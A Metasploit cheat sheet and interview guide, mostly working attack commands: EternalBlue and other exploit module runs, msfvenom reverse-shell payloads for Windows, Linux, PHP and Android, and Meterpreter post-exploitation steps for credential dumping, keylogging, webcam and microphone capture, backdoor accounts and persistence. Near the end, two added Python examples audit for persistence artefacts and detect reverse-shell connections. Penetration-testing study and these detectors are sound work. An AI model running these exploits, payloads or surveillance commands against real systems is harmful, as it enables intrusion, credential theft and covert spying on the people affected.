Penetration Testing Framework: Discover, exploit, and post-exploit vulnerabilities
Table of Contents
- What is Metasploit?
- Installation
- Core Concepts
- Basic Workflow
- Common Exploits
- Payload Generation (msfvenom)
- Meterpreter Commands
- Post-Exploitation
- Real-World Workflow
- Interview Questions & Answers
What is Metasploit?
Metasploit is the most widely used penetration testing framework. It lets you:
- Scan networks for vulnerabilities
- Exploit vulnerabilities automatically
- Generate custom payloads
- Establish reverse shells
- Escalate privileges
- Extract credentials
- Maintain persistence
- Post-exploitation activities
Versions:
- Metasploit Framework (Free)
- Metasploit Pro (Paid, more features)
Installation
Kali Linux (Pre-installed)
# Start PostgreSQL and initialise the Metasploit database (there is no separate "metasploit" service)
sudo systemctl start postgresql
sudo msfdb init
# Or manually
sudo service postgresql start
msfconsole
Ubuntu/Debian
# Install dependencies
sudo apt-get install postgresql libpq-dev
# Install with the Rapid7 omnibus installer: download it, review it, then run it rather than piping it into bash
curl -o msfinstall https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
chmod 755 msfinstall && ./msfinstall
# Or from GitHub
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
./msfconsole
macOS
brew install metasploit-framework
Start Metasploit
# Start the database and the console together
msfdb run
# Start the console without the database
msfconsole -n
# Start quietly (no banner)
msfconsole -q
Core Concepts
Modules
Exploit: code that triggers a specific vulnerability and delivers a payload
Payload: code executed on the target after successful exploitation
Encoder: re-encodes the payload, mainly to avoid bad characters and, historically, signature detection
Evasion: modules that build payloads intended to bypass security controls
Auxiliary: scanning, enumeration, fuzzing and other non-exploit tasks
Post: post-exploitation modules run against an existing session
Payloads
Types:
- Staged: a small stager connects back first and downloads the rest of the payload (stage 2)
- Non-staged (stageless): everything in one payload, so larger but self-contained
Common payloads:
- windows/meterpreter/reverse_tcp (Windows shell)
- linux/x86/meterpreter/reverse_tcp (Linux shell)
- php/meterpreter/reverse_tcp (PHP shell)
- android/meterpreter/reverse_http (Android shell)
- cmd/unix/reverse_sh (Linux shell)
LHOST & LPORT
LHOST: Your attacker machine IP
LPORT: Port where reverse shell connects back to you
Example:
LHOST: 192.168.1.50 (Your IP)
LPORT: 4444 (Your listening port)
Victim connects back: 192.168.1.50:4444
Basic Workflow
Step 1: Start Metasploit
sudo msfconsole
Step 2: Search for Exploit
msf> search type:exploit platform:windows eternalblue
msf> search type:exploit apache
# Matching modules are listed with Name, Disclosure Date, Rank, Check and Description columns, e.g.:
#   exploit/windows/smb/ms17_010_eternalblue
Step 3: Select Exploit
msf> use exploit/windows/smb/ms17_010_eternalblue
Step 4: Show Options
msf exploit(ms17_010_eternalblue)> show options
# Output (abridged):
#   Name     Current Setting   Required   Description
#   RHOSTS                     yes        Target host(s)
#   LHOST    192.168.1.50      yes        Attacker IP
#   LPORT    4444              yes        Listener port
# Payload options (windows/meterpreter/reverse_tcp by default) are listed in a separate block below the module options
Step 5: Set Options
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> set PAYLOAD windows/meterpreter/reverse_tcp
Step 6: Show Advanced Options
msf> show advanced
# Shows timeout, threading, encoding options
Step 7: Exploit!
msf> exploit
# Or run in background:
msf> exploit -j
# Check jobs:
msf> jobs -l
# Interact with session:
msf> sessions -i 1
Common Exploits
EternalBlue (Windows SMB RCE)
# Most famous exploit
# Affects Windows 7, 8, 8.1, 10, Server 2008, 2012, 2016
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit
# Creates reverse meterpreter shell
# Access Windows target completely
Apache Struts CVE-2017-5645
# Web server vulnerability
# Remote code execution
msf> use exploit/multi/http/struts2_rce_cve_2017_5645
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit
vsftpd Backdoor
# FTP server vulnerability
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf> set RHOSTS 192.168.1.100
msf> exploit
# Shell access to Linux
Tomcat Manager Upload
# Tomcat weak credentials
msf> use exploit/multi/http/tomcat_mgr_upload
msf> set RHOSTS 192.168.1.100
msf> set HttpUsername admin
msf> set HttpPassword admin
msf> exploit
Payload Generation (msfvenom)
Basic Syntax
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [OUTPUT]
Windows Payloads
# Reverse shell (TCP)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
# Bind shell (listen on target)
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe
# Staged payload: the '/' form (windows/meterpreter/reverse_tcp) sends a small stager first;
# the stageless form uses an underscore (windows/meterpreter_reverse_tcp) and is larger but self-contained
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
# With an encoder (shikata_ga_nai, 10 iterations); encoders mainly avoid bad characters
# and are not a reliable antivirus evasion on their own
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe
# As batch file
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f batch -o shell.bat
Linux Payloads
# ELF executable
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell
# Shell script
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.50 LPORT=4444 -f sh -o shell.sh
# Python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python -o shell.py
PHP Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.php
# Same payload written to a .txt so the PHP can be pasted into an existing PHP file
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.txt
Android Payloads
# APK reverse shell
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
Meterpreter Commands
Navigation & System Info
pwd # Current directory on the target
cd /path/to/dir # Change directory
ls -la # List files
cat /etc/passwd # Read file contents
getuid # User the session is running as
sysinfo # System information (OS, architecture, hostname)
ipconfig (or ifconfig) # IP configuration
# Native commands such as whoami, uname -a or hostname need a system shell: run `shell` first
File Operations
upload /path/local/file /path/remote/location # Upload file
download /path/remote/file /path/local/loc # Download file
rm /path/file # Delete file
mkdir /path/newdir # Create directory
Process Management
ps # List processes
kill [PID] # Kill process
getpid # Current process ID
migrate [PID] # Move to another process (stealth)
Credential Dumping
hashdump # Dump SAM hashes (Windows; needs SYSTEM)
lsa_dump_sam # Dump the SAM through LSA (kiwi extension: `load kiwi` first)
getsystem # Escalate to SYSTEM
Keylogging
keyscan_start # Start keystroke logging
keyscan_dump # Show captured keystrokes
keyscan_stop # Stop logging
Screenshot & Screen Capture
screenshot # Take screenshot
record_mic -d [SECONDS] # Record audio for the given number of seconds
webcam_snap # Capture webcam photo
webcam_stream # Stream webcam
Reverse Shell & Tunneling
shell # Drop to system shell
execute -f cmd.exe -i -c # Run a program with an interactive, channelized session
portfwd add -l [PORT] -p [REMOTE_PORT] -r [TARGET] # Port forwarding
Persistence
run persistence -X # Meterpreter persistence script: run at system startup
run persistence -U # Run when the user logs on
run scheduler -e # Schedule execution
reg setval -k path -v name -d data # Set a registry value (Windows)
Post-Exploitation
Windows Post-Exploitation
# Escalate to SYSTEM
getsystem
# Dump Windows hashes (needs SYSTEM)
hashdump
# Install persistence (run at startup)
run persistence -X
# Host enumeration scripts
run windows_enum_ad
run winenum
# Start keylogger
keyscan_start
keyscan_dump
Linux Post-Exploitation
# Check sudo rights
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check cron jobs
cat /etc/crontab
find /var/spool/cron -type f
# Create backdoor account
useradd -m backdoor
echo 'backdoor:password' | chpasswd
# SSH key persistence
echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys
Information Gathering Post-Exploitation
# Network configuration
ifconfig / ipconfig
# Routing table
route
# Active connections
netstat -an
# ARP table
arp -a
# Open ports
ss -tulpn
# Running services
ps aux
Real-World Workflow
Complete Exploitation Scenario
1. SCANNING
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run
# Find vulnerable Windows 7
2. SELECT EXPLOIT
msf> use exploit/windows/smb/ms17_010_eternalblue
3. SET OPTIONS
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set PAYLOAD windows/meterpreter/reverse_tcp
4. EXPLOIT
msf> exploit
5. POST-EXPLOITATION
meterpreter> getsystem
meterpreter> hashdump
meterpreter> keyscan_start
meterpreter> run persistence -X
meterpreter> record_mic -d 10
Interview Questions & Answers
Q1: What’s the difference between staged and non-staged payloads?
A:
- Staged: two-part payload
  - Stage 1: small loader (a few KB)
  - Stage 2: full payload, downloaded after Stage 1 connects back
  - Smaller initial size
  - Better for limited bandwidth
  - Example: windows/meterpreter/reverse_tcp
- Non-staged (stageless): single payload file
  - All in one executable
  - Larger size
  - Self-contained
  - Example: windows/shell_reverse_tcp
Q2: How would you generate a Windows reverse shell?
A:
# Generate EXE
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=4444 \
-f exe \
-o shell.exe
# On attacker machine (listener)
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> exploit
# On target
# Execute shell.exe
# Attacker gets reverse shell
Q3: What’s privilege escalation in Metasploit?
A:
Goal: Move from limited user to SYSTEM/root
Methods:
1. Exploit vulnerability (EternalBlue escalates automatically)
2. getsystem command (finds local privilege escalation)
3. Token impersonation (steal admin token)
4. Kernel exploit (exploit OS kernel)
Windows:
- getsystem
- steal_token
- bypassuac
Linux:
- Kernel exploit
- SUID binary
- Weak sudo permissions
Q4: How would you maintain persistence after exploitation?
A:
Methods:
1. Meterpreter persistence script
   run persistence -X (Windows startup)
2. Create backdoor user
   useradd -m backdoor
   echo 'backdoor:pass' | chpasswd
3. SSH key placement
   echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys
4. Cron job (Linux)
   * * * * * /path/to/shell.sh
5. Registry Run key (Windows)
   HKCU\Software\Microsoft\Windows\CurrentVersion\Run
6. Scheduled task (Windows)
   schtasks /create /tn "task" /tr "cmd.exe"
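An added audit example (not part of the cheat sheet) that checks for the Linux persistence artefacts listed in this answer and in the Linux Post-Exploitation section: a login account missing from the baseline, an every-minute cron job pointing at a scratch directory, and an SSH key with no recognised comment. The /etc/passwd, crontab and authorized_keys contents are constructed inline, and the allow-lists are assumptions a defender would fill from their own baseline.

```python
# Constructed stand-ins (not real host data) for /etc/passwd, `crontab -l` and ~/.ssh/authorized_keys.
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:x:1001:1001::/home/backdoor:/bin/sh
"""
CRONTAB = """# m h dom mon dow command
0 2 * * * /home/alice/bin/backup.sh
* * * * * /tmp/shell.sh
"""
AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYALICE alice@laptop
ssh-rsa AAAAB3NzaC1yc2EEXAMPLEUNKNOWNKEY
"""
KNOWN_USERS = {"root", "alice"}        # account baseline from provisioning (assumed)
KNOWN_KEY_COMMENTS = {"alice@laptop"}  # keys issued through the normal process (assumed)

def audit_passwd(passwd, known):
    """Flag login-capable accounts (uid >= 1000, real shell) missing from the baseline."""
    findings = []
    for line in passwd.splitlines():
        name, _, uid, _, _, _, shell = line.split(":")
        if int(uid) >= 1000 and not shell.endswith("nologin") and name not in known:
            findings.append(f"unexpected login account {name} (uid {uid}, shell {shell})")
    return findings

def audit_crontab(crontab):
    """Flag every-minute jobs and jobs whose command lives in a world-writable scratch dir."""
    findings = []
    for line in crontab.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        command = " ".join(fields[5:])
        if fields[:5] == ["*"] * 5:
            findings.append(f"every-minute cron job: {command}")
        if any(tok.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")) for tok in fields[5:]):
            findings.append(f"cron job runs from scratch dir: {command}")
    return findings

def audit_authorized_keys(keys, known_comments):
    """Flag keys with an unrecognised comment field; a bare `echo KEY >>` appends none."""
    findings = []
    for line in keys.splitlines():
        parts = line.split(None, 2)
        comment = parts[2] if len(parts) == 3 else ""
        if comment not in known_comments:
            findings.append(f"unrecognised SSH key {parts[0]} {parts[1][:12]}... comment={comment!r}")
    return findings
def run_audit():
    return (audit_passwd(PASSWD, KNOWN_USERS) + audit_crontab(CRONTAB)
            + audit_authorized_keys(AUTHORIZED_KEYS, KNOWN_KEY_COMMENTS))
```

On a real host, feed the functions the output of `getent passwd`, `crontab -l` for each user and each user's authorized_keys file, and compare against a baseline captured at provisioning time.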
Q5: What’s the significance of LHOST and LPORT?
A:
LHOST: Listener host (your attack machine IP)
LPORT: Listener port (where victim connects back)
Scenario:
1. Generate payload with LHOST=192.168.1.50, LPORT=4444
2. Send to victim
3. Victim executes payload
4. Victim initiates connection to 192.168.1.50:4444
5. You receive reverse shell on your machine
Why reverse?
- Victim is usually behind firewall
- Victim can connect OUT (to internet)
- You can't connect IN to victim
- Solution: Reverse shell (victim connects to you)
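An added detection example (not from the original page) for the callback pattern this answer describes, seen from the victim side: a reverse shell shows up as an outbound connection from an ephemeral local port to the attacker's fixed LPORT, while a bind shell (the bind_tcp payloads above) shows up as an unexpected listening socket. The `ss -tnap`-style rows and the allow-lists are constructed for the example.

```python
import re

# Constructed `ss -tnap`-style rows (not captured from a real host) for the victim in the
# scenario above: one callback to 192.168.1.50:4444 and one bind-shell listener amid normal traffic.
SS_OUTPUT = """State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0      128    0.0.0.0:4444         0.0.0.0:*          users:(("shell",pid=1402,fd=4))
ESTAB  0      0      192.168.1.100:49812  192.168.1.50:4444  users:(("shell",pid=1337,fd=3))
ESTAB  0      0      192.168.1.100:50210  142.250.74.78:443  users:(("firefox",pid=2210,fd=71))
ESTAB  0      0      192.168.1.100:22     192.168.1.20:53122 users:(("sshd",pid=901,fd=5))
"""
# Allow-lists are assumptions a defender would fill from their own baseline.
EXPECTED_LISTENERS = {("sshd", 22)}
EXPECTED_CLIENT_PORTS = {443, 80, 53, 22}
EXPECTED_CLIENTS = {"firefox", "apt", "curl"}
EPHEMERAL_START = 32768                      # Linux default ip_local_port_range start
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def parse_ss(output):
    """Turn ss rows into dicts; the header and rows without process info are skipped."""
    rows = []
    for line in output.splitlines()[1:]:
        f = line.split()
        m = PROC_RE.search(line)
        if len(f) < 6 or not m:
            continue
        rhost, rport = f[4].rsplit(":", 1)
        rows.append({"state": f[0], "lport": int(f[3].rsplit(":", 1)[1]),
                     "rhost": rhost, "rport": int(rport) if rport != "*" else None,
                     "proc": m.group(1), "pid": int(m.group(2))})
    return rows

def find_shells(rows):
    """Report bind-shell listeners and reverse-shell callbacks.

    A reverse shell is outbound from the victim: the local port is ephemeral (the
    victim initiated the connection) and the remote port is the attacker's fixed LPORT."""
    alerts = []
    for r in rows:
        if r["state"] == "LISTEN" and (r["proc"], r["lport"]) not in EXPECTED_LISTENERS:
            alerts.append(f"unexpected listener {r['proc']}[{r['pid']}] on port {r['lport']}")
        elif (r["state"] == "ESTAB" and r["lport"] >= EPHEMERAL_START
              and r["rport"] not in EXPECTED_CLIENT_PORTS and r["proc"] not in EXPECTED_CLIENTS):
            alerts.append(f"possible callback: {r['proc']}[{r['pid']}] -> {r['rhost']}:{r['rport']}")
    return alerts

if __name__ == "__main__":
    print(*find_shells(parse_ss(SS_OUTPUT)), sep="\n")
```

The same logic applies to the `netstat -an` and `ss -tulpn` output collected in the Information Gathering section, which is why defenders baseline expected listeners and client processes rather than only blocking inbound traffic.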
Good luck with testing! 🎯